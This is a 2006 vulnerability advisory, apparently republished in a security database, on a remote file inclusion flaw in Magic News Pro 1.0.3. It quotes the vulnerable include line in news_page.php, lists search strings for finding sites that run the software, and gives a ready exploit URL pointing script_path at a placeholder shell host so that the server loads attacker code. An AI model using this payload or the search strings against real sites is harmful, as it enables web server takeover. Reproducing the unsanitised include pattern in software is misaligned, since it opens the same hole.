Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

2006-09-15T00:00:00
ID SECURITYVULNS:DOC:14290
Type securityvulns
Reporter Securityvulns
Modified 2006-09-15T00:00:00

Description

====================================================================

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

====================================================================

Critical Level : Dangerous

By Saudi Hackrz

http://www.reamdaysoft.com

http://www.reamdaysoft.com/magic-news-pro/overview.html

=================================================================

Script Name: Magic News Pro v 1.0.3

Script :) << $$

http://www.9q9q.net/up3/index.php?f=jMicDawzV

=================================================================

Bug in : news_page.php

include_once($script_path."/config.php");

in <<<< news/scripts/news_page.php

Serche : "js-news.php?nr=" or "mgic news pro" or "js-news.php"

=================================================================

Exploit :

--------------------------------

http://sitename.com/news/scripts/news_page.php?script_path=http://SHELLURL.COM?

===============================================================================

Discoverd By : Saudi Hackrz

Conatact : Saudi.unix[at]hotmail.com

GreetZ :SnIpEr_Sa , KiNg18 , LeCoPrA And All My Frind :)

www.S3hr.com . www.elite-team.cc/vb .www.3asfh.net . www.lezr.com/vb .www.xp10.com

===============================================================================#